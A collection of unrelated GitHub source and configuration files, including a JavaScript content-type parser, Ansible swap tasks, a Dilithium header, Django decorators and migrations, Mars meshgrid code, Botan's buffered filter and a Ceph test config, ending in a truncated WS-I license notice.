? string.substr(0, index).trim() : string.trim() if (!typeRegExp.test(type)) { throw new TypeError('invalid media type') } var key var match var obj = new ContentType(type.toLowerCase()) var value paramRegExp.lastIndex = index while (match = paramRegExp.exec(string)) { if (match.index !== index) { throw new TypeError('invalid parameter format') } index += match[0].length key = match[1].toLowerCase() value = match[2] if (value[0] === '"') { // remove quotes and escapes value = value .substr(1, value.length - 2) .replace(qescRegExp, '$1') } obj.parameters[key] = value } if (index !== -1 && index !== string.length) { throw new TypeError('invalid parameter format') } return obj } /** * Get content-type from req/res objects. * * @param {object} * @return {Object} * @private */ function getcontenttype(obj) { if (typeof obj.getHeader === 'function') { // res-like return obj.getHeader('content-type') } if (typeof obj.headers === 'object') { // req-like return obj.headers && obj.headers['content-type'] } } /** * Quote a string if necessary. * * @param {string} val * @return {string} * @private */ function qstring(val) { var str = String(val) // no need to quote tokens if (tokenRegExp.test(str)) { return str } if (str.length > 0 && !textRegExp.test(str)) { throw new TypeError('invalid parameter value') } return '"' + str.replace(quoteRegExp, '\\$1') + '"' } /** * Class to represent a content type. * @private */ function ContentType(type) { this.parameters = Object.create(null) this.type = type }
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="utf-8"?> <style xmlns="http://purl.org/net/xbiblio/csl" version="1.0" default-locale="en-US"> <!-- Generated with https://github.com/citation-style-language/utilities/tree/master/generate_dependent_styles/data/iop --> <info> <title>European Journal of Physics</title> <id>http://www.zotero.org/styles/european-journal-of-physics</id> <link href="http://www.zotero.org/styles/european-journal-of-physics" rel="self"/> <link href="http://www.zotero.org/styles/institute-of-physics-numeric" rel="independent-parent"/> <link href="http://iopscience.iop.org/0143-0807" rel="documentation"/> <category citation-format="numeric"/> <category field="physics"/> <issn>0143-0807</issn> <eissn>1361-6404</eissn> <updated>2014-05-15T12:00:00+00:00</updated> <rights license="http://creativecommons.org/licenses/by-sa/3.0/">This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License</rights> </info> </style>
{ "pile_set_name": "Github" }
--- sbt_tarball: "sbt-{{sbt_version}}.tgz" sbt_download_location: "https://dl.bintray.com/sbt/native-packages/sbt/{{sbt_version}}/{{sbt_tarball}}"
{ "pile_set_name": "Github" }
#ifndef PQCLEAN_DILITHIUM3_AVX2_PACKING_H #define PQCLEAN_DILITHIUM3_AVX2_PACKING_H #include "api.h" #include "params.h" #include "polyvec.h" void PQCLEAN_DILITHIUM3_AVX2_pack_pk( uint8_t pk[PQCLEAN_DILITHIUM3_AVX2_CRYPTO_PUBLICKEYBYTES], const uint8_t rho[SEEDBYTES], const polyveck *t1); void PQCLEAN_DILITHIUM3_AVX2_pack_sk( uint8_t sk[PQCLEAN_DILITHIUM3_AVX2_CRYPTO_SECRETKEYBYTES], const uint8_t rho[SEEDBYTES], const uint8_t key[SEEDBYTES], const uint8_t tr[SEEDBYTES], const polyvecl *s1, const polyveck *s2, const polyveck *t0); void PQCLEAN_DILITHIUM3_AVX2_pack_sig( uint8_t sig[PQCLEAN_DILITHIUM3_AVX2_CRYPTO_SECRETKEYBYTES], const polyvecl *z, const polyveck *h, const poly *c); void PQCLEAN_DILITHIUM3_AVX2_unpack_pk( uint8_t rho[SEEDBYTES], polyveck *t1, const uint8_t pk[PQCLEAN_DILITHIUM3_AVX2_CRYPTO_PUBLICKEYBYTES]); void PQCLEAN_DILITHIUM3_AVX2_unpack_sk( uint8_t rho[SEEDBYTES], uint8_t key[SEEDBYTES], uint8_t tr[CRHBYTES], polyvecl *s1, polyveck *s2, polyveck *t0, const uint8_t *sk); int PQCLEAN_DILITHIUM3_AVX2_unpack_sig( polyvecl *z, polyveck *h, poly *c, const uint8_t sig[PQCLEAN_DILITHIUM3_AVX2_CRYPTO_BYTES]); #endif
{ "pile_set_name": "Github" }
/* * Tigase XMPP Server - The instant messaging server * Copyright (C) 2004 Tigase, Inc. ([email protected]) * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU Affero General Public License as published by * the Free Software Foundation, version 3 of the License. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU Affero General Public License for more details. * * You should have received a copy of the GNU Affero General Public License * along with this program. Look for COPYING file in the top folder. * If not, see http://www.gnu.org/licenses/. */ package tigase.component; import tigase.conf.Configurable; import tigase.db.AuthRepository; import tigase.db.UserRepository; import tigase.kernel.core.Kernel; import java.util.Collection; import java.util.HashMap; import java.util.Iterator; import java.util.Map; /** * Created by andrzej on 12.08.2016. */ public class BackwardCompatibilityHelper { public static Object convertToArray(Collection collection) { Iterator iter = collection.iterator(); if (!iter.hasNext()) { return null; } Class objCls = iter.next().getClass(); if (objCls == Integer.class) { return convertToIntArray(collection); } else if (objCls == Long.class) { return convertToLongArray(collection); } else if (objCls == Double.class) { return convertToDoubleArray(collection); } else if (objCls == Float.class) { return convertToFloatArray(collection); } else if (objCls == Boolean.class) { return convertToBoolArray(collection); } else if (objCls == String.class) { return convertToStringArray(collection); } return null; } public static Object convertToBoolArray(Collection col) { boolean[] arr = new boolean[col.size()]; int pos = 0; Iterator iter = col.iterator(); while (iter.hasNext()) { Boolean v = (Boolean) iter.next(); arr[pos++] = v.booleanValue(); } return arr; } public static Object convertToDoubleArray(Collection col) { double[] arr = new double[col.size()]; int pos = 0; Iterator iter = col.iterator(); while (iter.hasNext()) { Number v = (Number) iter.next(); arr[pos++] = v.doubleValue(); } return arr; } public static Object convertToFloatArray(Collection col) { float[] arr = new float[col.size()]; int pos = 0; Iterator iter = col.iterator(); while (iter.hasNext()) { Number v = (Number) iter.next(); arr[pos++] = v.floatValue(); } return arr; } public static Object convertToIntArray(Collection col) { int[] arr = new int[col.size()]; int pos = 0; Iterator iter = col.iterator(); while (iter.hasNext()) { Number v = (Number) iter.next(); arr[pos++] = v.intValue(); } return arr; } public static Object convertToLongArray(Collection col) { long[] arr = new long[col.size()]; int pos = 0; Iterator iter = col.iterator(); while (iter.hasNext()) { Number v = (Number) iter.next(); arr[pos++] = v.longValue(); } return arr; } public static Object convertToStringArray(Collection col) { String[] arr = new String[col.size()]; int pos = 0; Iterator iter = col.iterator(); while (iter.hasNext()) { String v = (String) iter.next(); arr[pos++] = v; } return arr; } public static Map<String, Object> fillProps(Map<String, Object> beanProperties) { Map<String, Object> result = new HashMap<>(); for (Map.Entry<String, Object> e : beanProperties.entrySet()) { String key = e.getKey(); Object value = e.getValue(); if (value instanceof Collection) { value = convertToArray((Collection) value); if (value != null) { result.put(key, value); } } if (value instanceof Map) { String prefix = key; for (Map.Entry<String, Object> e1 : ((Map<String, Object>) value).entrySet()) { result.put(key + "/" + e1.getKey(), e1.getValue()); } } else { result.put(key, value); } } return result; } public static Map<String, Object> getDefConfigParams(Kernel kernel, String configType, String dbUri, Map<String, Object> params) { Map<String, Object> initProperties = new HashMap<>(); initProperties.put("config-type", configType); for (Map.Entry<String, Object> e : params.entrySet()) { if (e.getKey().startsWith("-")) { initProperties.put(e.getKey(), e.getValue()); } } // Injecting default DB URI for backward compatibility initProperties.put(Configurable.USER_REPO_URL_PROP_KEY, dbUri); initProperties.put(Configurable.GEN_USER_DB_URI, dbUri); UserRepository userRepo = kernel.getInstance(UserRepository.class); initProperties.put(Configurable.SHARED_USER_REPO_PROP_KEY, userRepo); AuthRepository authRepo = kernel.getInstance(AuthRepository.class); initProperties.put(Configurable.SHARED_AUTH_REPO_PROP_KEY, authRepo); return initProperties; } }
{ "pile_set_name": "Github" }
- name: Swap | Create swap space command: dd if=/dev/zero of=/extraswap bs=1M count={{ swap_size_in_mb }} - name: Swap | Make swap command: mkswap /extraswap - name: Swap | Add to fstab action: lineinfile dest=/etc/fstab regexp="extraswap" line="/extraswap none swap sw 0 0" state=present - name: Swap | Turn swap on command: swapon -a - name: Swap | Set swapiness shell: echo 0 | sudo tee /proc/sys/vm/swappiness
{ "pile_set_name": "Github" }
# $NetBSD: Makefile,v 1.9 2012/10/06 11:54:38 asau Exp $ # DISTNAME= fortunes-calvin-0.2 CATEGORIES= games MASTER_SITES= http://www.netmeister.org/apps/ EXTRACT_SUFX= .gz MAINTAINER= [email protected] HOMEPAGE= http://www.netmeister.org/misc.html COMMENT= Fortunes from the famous Calvin & Hobbes comic strips BUILD_DEPENDS+= fortune-strfile-[0-9]*:../../games/fortune-strfile DIST_SUBDIR= ${PKGNAME_NOREV}nb1 STRFILE= ${LOCALBASE}/bin/strfile WRKSRC= ${WRKDIR} do-build: ${STRFILE} ${WRKDIR}/${DISTNAME} do-install: ${INSTALL_DATA_DIR} ${DESTDIR}${PREFIX}/share/games/fortune/ ${INSTALL_DATA} ${WRKDIR}/${DISTNAME} \ ${DESTDIR}${PREFIX}/share/games/fortune/calvin ${INSTALL_DATA} ${WRKDIR}/${DISTNAME}.dat \ ${DESTDIR}${PREFIX}/share/games/fortune/calvin.dat .include "../../mk/bsd.pkg.mk"
{ "pile_set_name": "Github" }
# SOME DESCRIPTIVE TITLE. # Copyright (C) YEAR THE PACKAGE'S COPYRIGHT HOLDER # This file is distributed under the same license as the PACKAGE package. # FIRST AUTHOR <EMAIL@ADDRESS>, YEAR. # msgid "" msgstr "" "Project-Id-Version: django-registration trunk\n" "Report-Msgid-Bugs-To: \n" "POT-Creation-Date: 2008-04-05 13:51+0200\n" "PO-Revision-Date: 2008-04-05 14:00+0100\n" "Last-Translator: Nebojsa Djordjevic <[email protected]>\n" "Language-Team: \n" "MIME-Version: 1.0\n" "Content-Type: text/plain; charset=UTF-8\n" "Content-Transfer-Encoding: 8bit\n" "Plural-Forms: nplurals=3; plural=n%10==1 && n%100!=11 ? 0 : n%10>=2 && n%10<=4 && (n%100<10 || n%100>=20) ? 1 : 2;\n" "X-Poedit-Language: Serbian\n" "X-Poedit-Country: YUGOSLAVIA\n" #: forms.py:38 msgid "username" msgstr "korisničko ime" #: forms.py:41 msgid "email address" msgstr "email adresa" #: forms.py:43 msgid "password" msgstr "šifra" #: forms.py:45 msgid "password (again)" msgstr "šifra (ponovo)" #: forms.py:54 msgid "Usernames can only contain letters, numbers and underscores" msgstr "Korisničko ime može da se sastoji samo od slova, brojeva i donje crte (\"_\")" #: forms.py:59 msgid "This username is already taken. Please choose another." msgstr "Korisničko ime je već zauzeto. Izaberite drugo." #: forms.py:71 msgid "You must type the same password each time" msgstr "Unete šifre se ne slažu" #: forms.py:100 msgid "I have read and agree to the Terms of Service" msgstr "Pročitao sam i slažem se sa uslovima korišćenja" #: forms.py:109 msgid "You must agree to the terms to register" msgstr "Morate se složiti sa uslovima korišćenja da bi ste se registrovali" #: forms.py:128 msgid "This email address is already in use. Please supply a different email address." msgstr "Ova e-mail adresa je već u upotrebi. Morate koristiti drugu e-mail adresu." #: forms.py:153 msgid "Registration using free email addresses is prohibited. Please supply a different email address." msgstr "Registracija korišćenjem besplatnig e-mail adresa je zabranjena. Morate uneti drugu e-mail adresu." #: models.py:188 msgid "user" msgstr "korisnik" #: models.py:189 msgid "activation key" msgstr "aktivacioni ključ" #: models.py:194 msgid "registration profile" msgstr "registracioni profil" #: models.py:195 msgid "registration profiles" msgstr "registracioni profili"
{ "pile_set_name": "Github" }
/* Работа с GUI. */ #pragma once namespace Gui { /* Инициализация. */ void init(void); /* Деинициализация. */ void uninit(void); /* Кээлбэк для _enumWindows(). IN window - окно. IN param - параметр. Return - true - продолжить поиск, false - прервать поиск. */ typedef bool (ENUMWINDOWSPROC)(HWND window, void *param); /* Перечисление дочерных окон. IN owner - родитель, может быть NULL. IN topToDown - true - перечислять с верху вниз, false - снизу вверх. IN proc - кэлбэк. IN param - параметр для кэлбэка. */ void _enumWindows(HWND owner, bool topToDown, ENUMWINDOWSPROC proc, void *param); /* Данная функция является обреткой для WindowFromPoint(), которая пропускает HTTRANSPARENT. Способ реализации доволно наивен, но мне не удалсоь найти более нормального способа. IN point - координаты для поиска окна. IN timeout - таймаут для WM_NCHITTEST. OUT hitTest - HitTest окна. Может быть NULL. Return - хэндл окна, или NULL. */ HWND _windowFromPoint(POINT point, DWORD timeout, DWORD *hitTest); /* Проверяет имеет ли стиль окна бордюры с изменением размера. IN style - стиль окна. Return - true - стиль имеед бордюры, false - не имеет. */ bool _styleHaveSizeBorders(DWORD style); /* Загрузка иконки как shared (не трубует удаления). IN module - моудль. IN id - ID. */ HICON _loadSharedIcon(HMODULE module, const LPWSTR id); /* Получение текста окна с выделением памяти. IN window - окно. OUT size - размер строки без нулевого соимвола. Может быть NULL. Return - текст окна (нужно освободить через NULL), или NULL в случаи ошибки. */ LPWSTR _getWindowText(HWND window, LPDWORD size); /* Загрузка курсора как shared (не трубует удаления). IN module - моудль. IN id - ID. */ HCURSOR _loadSharedCursor(HMODULE module, const LPWSTR id); /* Создание шрифта FONT_DIALOG. IN pointSize - размер шрифта в поинтах, рекомендуется значение 8. Return - хэндл шрифта, или NULL в случаи ошибки. */ HFONT _createDialogFont(BYTE pointSize); /* Запуск диалога выбора файла. IN owner - хэндл родителя IN initialDir - директория отностиельно который открывается диалог. Может быть NULL. IN OUT fileBuffer - на входе - инициализационный путь/файл, на выходе - выбранный файл. Return - true - в случаи успеха, false - в случаи провала. */ bool _browseForFile(HWND owner, LPWSTR initialDir, LPWSTR fileBuffer); /* Запуск диалога сохранения файла. IN owner - хэндл родителя IN initialDir - директория отностиельно который открывается диалог. Может быть NULL. IN OUT fileBuffer - на входе - инициализационный путь/файл, на выходе - выбранный файл. IN defaultExtension - расширение по умолчанию (без точки). Может быть NULL. IN filter - фильтр. См. OPENFILENAME.lpstrFilter. IN filterIndex - выделеный индекс элемента в filter. Return - true - в случаи успеха, false - в случаи провала. */ bool _browseForSaveFile(HWND owner, LPWSTR initialDir, LPWSTR fileBuffer, LPWSTR defaultExtension, LPWSTR filter, DWORD filterIndex); /* Инициализация общих контролев (надстройка для InitCommonControlsEx()). IN classes - ICC_*. Return - true - в случаи успеха, false - в случаи ошибки. */ bool _loadCommonControl(DWORD classes); };
{ "pile_set_name": "Github" }
from functools import wraps from django.utils.cache import patch_vary_headers from django.utils.decorators import available_attrs def vary_on_headers(*headers): """ A view decorator that adds the specified headers to the Vary header of the response. Usage: @vary_on_headers('Cookie', 'Accept-language') def index(request): ... Note that the header names are not case-sensitive. """ def decorator(func): @wraps(func, assigned=available_attrs(func)) def inner_func(*args, **kwargs): response = func(*args, **kwargs) patch_vary_headers(response, headers) return response return inner_func return decorator def vary_on_cookie(func): """ A view decorator that adds "Cookie" to the Vary header of a response. This indicates that a page's contents depends on cookies. Usage: @vary_on_cookie def index(request): ... """ @wraps(func, assigned=available_attrs(func)) def inner_func(*args, **kwargs): response = func(*args, **kwargs) patch_vary_headers(response, ('Cookie',)) return response return inner_func
{ "pile_set_name": "Github" }
set currentlyPlayingTrack to getCurrentlyPlayingTrack() -- Method to get the currently playing track on getCurrentlyPlayingTrack() tell application "Spotify" set currentArtist to artist of current track as string set currentTrack to name of current track as string return currentArtist & " - " & currentTrack end tell end getCurrentlyPlayingTrack
{ "pile_set_name": "Github" }
// Copyright (c) 2017-present PyO3 Project and Contributors //! Python object protocols #[macro_use] mod macros; pub mod basic; #[cfg(not(Py_LIMITED_API))] pub mod buffer; pub mod context; pub mod descr; pub mod gc; pub mod iter; pub mod mapping; pub mod methods; pub mod number; pub mod proto_methods; pub mod pyasync; pub mod sequence; pub use self::basic::PyObjectProtocol; #[cfg(not(Py_LIMITED_API))] pub use self::buffer::PyBufferProtocol; pub use self::context::PyContextProtocol; pub use self::descr::PyDescrProtocol; pub use self::gc::{PyGCProtocol, PyTraverseError, PyVisit}; pub use self::iter::PyIterProtocol; pub use self::mapping::PyMappingProtocol; pub use self::methods::{ PyClassAttributeDef, PyGetterDef, PyMethodDef, PyMethodDefType, PyMethodType, PySetterDef, }; pub use self::number::PyNumberProtocol; pub use self::pyasync::PyAsyncProtocol; pub use self::sequence::PySequenceProtocol;
{ "pile_set_name": "Github" }
BASE <http://example.org/> PREFIX : <#> SELECT * WHERE { :x :p 'x\'' }
{ "pile_set_name": "Github" }
# -*- encoding: utf-8 -*- $_ = "あれ" print Kernel.chop
{ "pile_set_name": "Github" }
#!/usr/bin/env python # -*- coding: utf-8 -*- # Copyright 1999-2020 Alibaba Group Holding Ltd. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from .array import tensor def meshgrid(*xi, **kwargs): """ Return coordinate matrices from coordinate vectors. Make N-D coordinate arrays for vectorized evaluations of N-D scalar/vector fields over N-D grids, given one-dimensional coordinate tensors x1, x2,..., xn. Parameters ---------- x1, x2,..., xn : array_like 1-D arrays representing the coordinates of a grid. indexing : {'xy', 'ij'}, optional Cartesian ('xy', default) or matrix ('ij') indexing of output. See Notes for more details. sparse : bool, optional If True a sparse grid is returned in order to conserve memory. Default is False. Returns ------- X1, X2,..., XN : Tensor For vectors `x1`, `x2`,..., 'xn' with lengths ``Ni=len(xi)`` , return ``(N1, N2, N3,...Nn)`` shaped tensors if indexing='ij' or ``(N2, N1, N3,...Nn)`` shaped tensors if indexing='xy' with the elements of `xi` repeated to fill the matrix along the first dimension for `x1`, the second for `x2` and so on. Notes ----- This function supports both indexing conventions through the indexing keyword argument. Giving the string 'ij' returns a meshgrid with matrix indexing, while 'xy' returns a meshgrid with Cartesian indexing. In the 2-D case with inputs of length M and N, the outputs are of shape (N, M) for 'xy' indexing and (M, N) for 'ij' indexing. In the 3-D case with inputs of length M, N and P, outputs are of shape (N, M, P) for 'xy' indexing and (M, N, P) for 'ij' indexing. The difference is illustrated by the following code snippet:: xv, yv = mt.meshgrid(x, y, sparse=False, indexing='ij') for i in range(nx): for j in range(ny): # treat xv[i,j], yv[i,j] xv, yv = mt.meshgrid(x, y, sparse=False, indexing='xy') for i in range(nx): for j in range(ny): # treat xv[j,i], yv[j,i] In the 1-D and 0-D case, the indexing and sparse keywords have no effect. Examples -------- >>> import mars.tensor as mt >>> nx, ny = (3, 2) >>> x = mt.linspace(0, 1, nx) >>> y = mt.linspace(0, 1, ny) >>> xv, yv = mt.meshgrid(x, y) >>> xv.execute() array([[ 0. , 0.5, 1. ], [ 0. , 0.5, 1. ]]) >>> yv.execute() array([[ 0., 0., 0.], [ 1., 1., 1.]]) >>> xv, yv = mt.meshgrid(x, y, sparse=True) # make sparse output arrays >>> xv.execute() array([[ 0. , 0.5, 1. ]]) >>> yv.execute() array([[ 0.], [ 1.]]) `meshgrid` is very useful to evaluate functions on a grid. >>> import matplotlib.pyplot as plt >>> x = mt.arange(-5, 5, 0.1) >>> y = mt.arange(-5, 5, 0.1) >>> xx, yy = mt.meshgrid(x, y, sparse=True) >>> z = mt.sin(xx**2 + yy**2) / (xx**2 + yy**2) >>> h = plt.contourf(x,y,z) """ from ..base import broadcast_to indexing = kwargs.pop('indexing', 'xy') sparse = kwargs.pop('sparse', False) if kwargs: raise TypeError( f"meshgrid() got an unexpected keyword argument '{list(kwargs)[0]}'") if indexing not in ('xy', 'ij'): raise ValueError("Valid values for `indexing` are 'xy' and 'ij'.") xi = [tensor(x) for x in xi] xi = [a.ravel() for a in xi] shape = [x.size for x in xi] if indexing == 'xy' and len(xi) > 1: xi[0], xi[1] = xi[1], xi[0] shape[0], shape[1] = shape[1], shape[0] grid = [] for i, x in enumerate(xi): slc = [None] * len(shape) slc[i] = slice(None) r = x[tuple(slc)] if not sparse: r = broadcast_to(r, shape) grid.append(r) if indexing == 'xy' and len(xi) > 1: grid[0], grid[1] = grid[1], grid[0] return grid
{ "pile_set_name": "Github" }
# encoding: utf-8 import datetime from south.db import db from south.v2 import SchemaMigration from django.db import models class Migration(SchemaMigration): def forwards(self, orm): # Adding model 'AllocationChange' db.create_table('allocation_change', ( ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)), ('application', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['management_database.Application'])), ('component', self.gf('django.db.models.fields.CharField')(max_length=255)), ('quantity', self.gf('django.db.models.fields.IntegerField')()), ('billed', self.gf('django.db.models.fields.BooleanField')(default=False)), ('timestamp', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)), )) db.send_create_signal('management_database', ['AllocationChange']) def backwards(self, orm): # Deleting model 'AllocationChange' db.delete_table('allocation_change') models = { 'management_database.allocationchange': { 'Meta': {'object_name': 'AllocationChange', 'db_table': "'allocation_change'"}, 'application': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['management_database.Application']"}), 'billed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'component': ('django.db.models.fields.CharField', [], {'max_length': '255'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'quantity': ('django.db.models.fields.IntegerField', [], {}), 'timestamp': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}) }, 'management_database.application': { 'Meta': {'object_name': 'Application', 'db_table': "'application'"}, 'account': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['management_database.User']"}), 'app_gid': ('django.db.models.fields.IntegerField', [], {'default': '-1'}), 'bundle_version': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255'}), 'cron_uid': ('django.db.models.fields.IntegerField', [], {'default': '-1'}), 'db_host': ('django.db.models.fields.CharField', [], {'max_length': '255'}), 'db_max_size_mb': ('django.db.models.fields.IntegerField', [], {'default': '5'}), 'db_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}), 'db_password': ('django.db.models.fields.CharField', [], {'max_length': '255'}), 'db_port': ('django.db.models.fields.IntegerField', [], {'default': '3306'}), 'db_username': ('django.db.models.fields.CharField', [], {'max_length': '255'}), 'debug': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'deleted': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}), 'proc_mem_mb': ('django.db.models.fields.IntegerField', [], {'default': '64'}), 'proc_num_threads': ('django.db.models.fields.IntegerField', [], {'default': '5'}), 'proc_stack_mb': ('django.db.models.fields.IntegerField', [], {'default': '2'}), 'setup_uid': ('django.db.models.fields.IntegerField', [], {'default': '-1'}), 'web_uid': ('django.db.models.fields.IntegerField', [], {'default': '-1'}) }, 'management_database.process': { 'Meta': {'unique_together': "(('application', 'host'),)", 'object_name': 'Process', 'db_table': "'process'"}, 'application': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['management_database.Application']"}), 'host': ('django.db.models.fields.CharField', [], {'max_length': '255'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'num_procs': ('django.db.models.fields.IntegerField', [], {'default': '1'}) }, 'management_database.user': { 'Meta': {'object_name': 'User', 'db_table': "'user'"}, 'admin': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'customer_id': ('django.db.models.fields.CharField', [], {'max_length': '255'}), 'email': ('django.db.models.fields.CharField', [], {'max_length': '255'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'passwd': ('django.db.models.fields.CharField', [], {'max_length': '255'}), 'subscription_id': ('django.db.models.fields.CharField', [], {'max_length': '255'}) }, 'management_database.whitelist': { 'Meta': {'object_name': 'WhiteList', 'db_table': "'whitelist'"}, 'email': ('django.db.models.fields.CharField', [], {'max_length': '255'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'invite_code': ('django.db.models.fields.CharField', [], {'max_length': '255'}) } } complete_apps = ['management_database']
{ "pile_set_name": "Github" }
<component name="libraryTable"> <library name="Maven: org.springframework:spring-core:3.2.9.RELEASE"> <CLASSES> <root url="jar://$PROJECT_DIR$/../../maven/repository/org/springframework/spring-core/3.2.9.RELEASE/spring-core-3.2.9.RELEASE.jar!/" /> </CLASSES> <JAVADOC> <root url="jar://$PROJECT_DIR$/../../maven/repository/org/springframework/spring-core/3.2.9.RELEASE/spring-core-3.2.9.RELEASE-javadoc.jar!/" /> </JAVADOC> <SOURCES> <root url="jar://$PROJECT_DIR$/../../maven/repository/org/springframework/spring-core/3.2.9.RELEASE/spring-core-3.2.9.RELEASE-sources.jar!/" /> </SOURCES> </library> </component>
{ "pile_set_name": "Github" }
/* * Buffered Filter * (C) 1999-2007 Jack Lloyd * * Botan is released under the Simplified BSD License (see license.txt) */ #include <botan/buf_filt.h> #include <botan/mem_ops.h> #include <botan/internal/rounding.h> #include <botan/exceptn.h> namespace Botan { /* * Buffered_Filter Constructor */ Buffered_Filter::Buffered_Filter(size_t b, size_t f) : m_main_block_mod(b), m_final_minimum(f) { if(m_main_block_mod == 0) throw Invalid_Argument("m_main_block_mod == 0"); if(m_final_minimum > m_main_block_mod) throw Invalid_Argument("m_final_minimum > m_main_block_mod"); m_buffer.resize(2 * m_main_block_mod); m_buffer_pos = 0; } /* * Buffer input into blocks, trying to minimize copying */ void Buffered_Filter::write(const uint8_t input[], size_t input_size) { if(!input_size) return; if(m_buffer_pos + input_size >= m_main_block_mod + m_final_minimum) { size_t to_copy = std::min<size_t>(m_buffer.size() - m_buffer_pos, input_size); copy_mem(&m_buffer[m_buffer_pos], input, to_copy); m_buffer_pos += to_copy; input += to_copy; input_size -= to_copy; size_t total_to_consume = round_down(std::min(m_buffer_pos, m_buffer_pos + input_size - m_final_minimum), m_main_block_mod); buffered_block(m_buffer.data(), total_to_consume); m_buffer_pos -= total_to_consume; copy_mem(m_buffer.data(), m_buffer.data() + total_to_consume, m_buffer_pos); } if(input_size >= m_final_minimum) { size_t full_blocks = (input_size - m_final_minimum) / m_main_block_mod; size_t to_copy = full_blocks * m_main_block_mod; if(to_copy) { buffered_block(input, to_copy); input += to_copy; input_size -= to_copy; } } copy_mem(&m_buffer[m_buffer_pos], input, input_size); m_buffer_pos += input_size; } /* * Finish/flush operation */ void Buffered_Filter::end_msg() { if(m_buffer_pos < m_final_minimum) throw Exception("Buffered filter end_msg without enough input"); size_t spare_blocks = (m_buffer_pos - m_final_minimum) / m_main_block_mod; if(spare_blocks) { size_t spare_bytes = m_main_block_mod * spare_blocks; buffered_block(m_buffer.data(), spare_bytes); buffered_final(&m_buffer[spare_bytes], m_buffer_pos - spare_bytes); } else { buffered_final(m_buffer.data(), m_buffer_pos); } m_buffer_pos = 0; } }
{ "pile_set_name": "Github" }
--- ceph_origin: repository ceph_repository: community cluster: ceph public_network: "192.168.39.0/24" cluster_network: "192.168.40.0/24" monitor_interface: "{{ 'eth1' if ansible_distribution == 'CentOS' else 'ens6' }}" radosgw_interface: "{{ 'eth1' if ansible_distribution == 'CentOS' else 'ens6' }}" osd_objectstore: "bluestore" crush_device_class: test copy_admin_key: true devices: - /dev/disk/by-id/ata-QEMU_HARDDISK_QM00002 - /dev/sdc os_tuning_params: - { name: fs.file-max, value: 26234859 } ceph_conf_overrides: global: mon_allow_pool_size_one: true mon_warn_on_pool_no_redundancy: false osd_pool_default_size: 1 dashboard_enabled: False handler_health_mon_check_delay: 10 handler_health_osd_check_delay: 10
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="UTF-8"?> <!-- Copyright (c) 2002-2004 by The Web Services-Interoperability Organization (WS-I) and Certain of its Members. All Rights Reserved. Notice The material contained herein is not a license, either expressly or impliedly, to any intellectual property owned or controlled by any of the authors or developers of this material or WS-I. The material contained herein is provided on an "AS IS" basis and to the maximum extent permitted by applicable law, this material is provided AS IS AND WITH ALL FAULTS, and the authors and developers of this material and WS-I hereby disclaim all other warranties and conditions, either express, implied or statutory, including, but not limited to, any (if any) implied warranties, duties or conditions of merchantability, of fitness for a particular purpose, of accuracy or completeness of responses, of results, of workmanlike effort, of lack of viruses, and of lack of negligence. ALSO, THERE IS NO WARRANTY OR CONDITION OF TITLE, QUIET ENJOYMENT, QUIET POSSESSION, CORRESPONDENCE TO DESCRIPTION OR NON-INFRINGEMENT WITH REGARD TO THIS MATERIAL. IN NO EVENT WILL ANY AUTHOR OR DEVELOPER OF THIS MATERIAL OR WS-I BE LIABLE TO ANY OTHER PARTY FOR THE COST OF PROCURING SUBSTITUTE GOODS OR SERVICES, LOST PROFITS, LOSS OF USE, LOSS OF DATA, OR ANY INCIDENTAL, CONSEQUENTIAL, DIRECT, INDIRECT, OR SPECIAL DAMAGES WHETHER UNDER CONTRACT, TORT, WARRANTY, OR OTHERWISE, ARISING IN ANY WAY OUT OF THIS OR ANY OTHER AGREEMENT RELATING TO THIS MATERIAL, WHETHER OR NOT SUCH PARTY HAD ADVANCE NOTICE OF THE POSSIBILITY OF SUCH DAMAGES. WS-I License Information Use of this WS-I Material is governed by the WS-I Test License and other licenses. Information on these licenses are contained in the README.txt and ReleaseNotes.txt files. By downloading this file, you agree to the terms of these licenses. How To Provide Feedback The Web Services-Interoperability Organization (WS-I) would like to receive input, suggestions and other feedback ("Feedback") on this work from a wide variety of industry participants to improve its quality over time. By sending email, or otherwise communicating with WS-I, you (on behalf of yourself if you are an individual, and your company if you are providing Feedback on behalf of the company) will be deemed to have granted to WS-I, the members of WS-I, and other parties that have access to your Feedback, a non-exclusive, non-transferable, worldwide, perpetual, irrevocable, royalty-free license to use, disclose, copy, license, modify, sublicense or otherwise distribute and exploit in any manner whatsoever the Feedback you provide regarding the work. You acknowledge that you have no expectation of confidentiality with respect to any Feedback you provide. You represent and warrant that you have rights to provide this Feedback, and if you are providing Feedback on behalf of a company, you represent and warrant that you have the rights to provide Feedback on behalf of your company. You also acknowledge that WS-I is not required to review, discuss, use, consider or in any way incorporate your Feedback into future versions of its work. If 